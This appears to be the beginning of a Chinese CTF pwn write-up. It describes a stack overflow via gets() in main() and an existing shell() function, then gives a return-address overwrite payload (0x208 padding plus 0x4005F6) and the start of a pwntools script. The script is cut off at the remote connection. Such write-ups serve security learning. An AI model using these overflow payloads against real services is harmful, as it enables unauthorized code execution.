0x0 程序保护和流程 保护: 流程: main() gets明显存在栈溢出。又在函数列表中找到了shell()函数。 0x1 利用过程 直接覆盖return的地址payload=0x208*‘a’+p64(0x4005F6) exp from pwn import * #sh=process('./a') sh=remote